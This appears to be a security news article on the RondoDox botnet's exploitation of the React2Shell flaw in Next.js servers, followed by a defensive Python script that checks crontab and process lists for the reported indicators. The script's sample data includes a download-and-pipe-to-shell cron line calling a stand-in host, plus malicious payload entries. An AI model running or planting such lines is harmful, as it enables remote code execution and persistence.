
The RondoDox botnet is reportedly leveraging the critical React2Shell vulnerability (CVE-2025-55182) to compromise Next.js servers, deploying malware and cryptominers.
Fortinet initially documented RondoDox in July 2025 as a significant botnet known for exploiting various n-day vulnerabilities worldwide. More recently, in November, VulnCheck identified new RondoDox versions incorporating exploits for CVE-2025-24893, a critical remote code execution flaw in the XWiki Platform.
According to a recent report by cybersecurity company CloudSEK, the RondoDox botnet initiated scans for vulnerable Next.js servers on December 8, subsequently deploying botnet clients starting three days later.
React2Shell is an unauthenticated remote code execution (RCE) vulnerability. It can be exploited with a single HTTP request and impacts all frameworks utilizing the React Server Components (RSC) ‘Flight’ protocol, such as Next.js.
This vulnerability has been exploited by various threat actors to compromise numerous organizations. Notably, North Korean hackers have used React2Shell to deploy a new malware family known as EtherRAT.
As of December 30, the Shadowserver Foundation has reported identifying more than 94,000 internet-exposed assets susceptible to the React2Shell vulnerability.
CloudSEK indicates that RondoDox has gone through three distinct operational phases over the course of 2025:
- Reconnaissance and vulnerability testing from March to April 2025
- Automated web app exploitation from April to June 2025
- Large-scale IoT botnet deployment from July 2025 onward
Researchers note that RondoDox has recently intensified its exploitation efforts targeting React2Shell, conducting over 40 exploit attempts within a six-day period in December.
In the current phase, the botnet runs hourly IoT exploitation waves, specifically targeting Linksys, Wavlink, and other consumer and enterprise routers to enlist new bots.
CloudSEK states that after identifying potentially vulnerable servers, RondoDox began deploying payloads such as a coinminer (/nuts/poop), a botnet loader and health checker (/nuts/bolts), and a Mirai variant (/nuts/x86).
The ‘bolts’ component is designed to remove rival botnet malware from the compromised host, establish persistence through /etc/crontab, and terminate non-whitelisted processes every 45 seconds, according to researchers.
CloudSEK offers recommendations for organizations to defend against RondoDox activity. These include auditing and patching Next.js Server Actions, isolating IoT devices into dedicated virtual LANs, and monitoring for suspicious process executions.
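The persistence and payload indicators described above (the /nuts/ payload paths and the /etc/crontab entry) lend themselves to a simple host check that covers the "monitor for suspicious process executions" recommendation. The following is an added example written for this article; it is not CloudSEK's tooling or any RondoDox code. The crontab and process-list samples are constructed, and the /tmp, /dev/shm and download-and-pipe-to-shell heuristics are general assumptions of the example rather than indicators reported in the research.

```python
import re
from dataclasses import dataclass

# The /nuts/ paths are the payload locations reported in the article.
# The writable-directory and download-and-pipe heuristics are generic
# assumptions of this example, not indicators from the research.
INDICATOR_PATHS = ("/nuts/",)
SUSPECT_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")


@dataclass
class CronEntry:
    schedule: str
    user: str
    command: str
    raw: str


def parse_system_crontab(text):
    """Parse /etc/crontab (system format: 5 time fields, user, command)."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        # Skip blanks, comments and SHELL=/PATH= style assignments.
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_]+=", line):
            continue
        if line.startswith("@"):  # @reboot / @hourly form: keyword user command
            parts = line.split(None, 2)
            if len(parts) == 3:
                entries.append(CronEntry(parts[0], parts[1], parts[2], raw))
            continue
        parts = line.split(None, 6)
        if len(parts) == 7:
            entries.append(CronEntry(" ".join(parts[:5]), parts[5], parts[6], raw))
    return entries


def cron_findings(entries):
    """Return (raw_line, reasons) for entries that match the heuristics."""
    findings = []
    for e in entries:
        reasons = []
        if any(p in e.command for p in INDICATOR_PATHS):
            reasons.append("known RondoDox payload path")
        if any(d in e.command for d in SUSPECT_DIRS):
            reasons.append("executes from world-writable dir")
        if DOWNLOAD_EXEC.search(e.command):
            reasons.append("download-and-pipe-to-shell")
        if e.schedule == "@reboot" and reasons:
            reasons.append("persists across reboot")
        if reasons:
            findings.append((e.raw, reasons))
    return findings


def process_findings(ps_text):
    """Scan `ps -eo pid,user,args` output; return (pid, args, reasons)."""
    findings = []
    for line in ps_text.splitlines()[1:]:  # first line is the header
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, _user, args = parts
        exe = args.split()[0]
        reasons = []
        if any(p in exe for p in INDICATOR_PATHS):
            reasons.append("known RondoDox payload path")
        if exe.startswith(SUSPECT_DIRS):
            reasons.append("executes from world-writable dir")
        if reasons:
            findings.append((int(pid), args, reasons))
    return findings


# Constructed sample: a Debian-style /etc/crontab with three appended entries
# modelled on the persistence described in the article. The wget line and the
# 203.0.113.10 (TEST-NET) address are invented for the example.
SAMPLE_CRONTAB = """SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
@reboot root /nuts/bolts
*/1 * * * * root /nuts/bolts >/dev/null 2>&1
* * * * * root wget -q -O - http://203.0.113.10/x.sh | sh
"""

# Constructed sample of `ps -eo pid,user,args`; /tmp/.x86 is invented.
SAMPLE_PS = """  PID USER     COMMAND
    1 root     /sbin/init
  412 root     /usr/sbin/cron -f
 1337 root     /nuts/poop
 1340 root     /nuts/bolts
 1351 root     /tmp/.x86 -p 1337
 2001 www-data node /app/server.js
"""

if __name__ == "__main__":
    for raw, why in cron_findings(parse_system_crontab(SAMPLE_CRONTAB)):
        print(f"[cron] {raw}\n       {', '.join(why)}")
    for pid, args, why in process_findings(SAMPLE_PS):
        print(f"[proc] pid={pid} {args}\n       {', '.join(why)}")
```

On a real host, replace the constructed samples with the contents of /etc/crontab (and the per-user crontabs under /var/spool/cron) and the live `ps -eo pid,user,args` output; the check is cheap enough to run from a scheduled job, which is also where a 45-second process-killing watchdog like the one attributed to `bolts` would show up as repeated short-lived children of the same parent.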

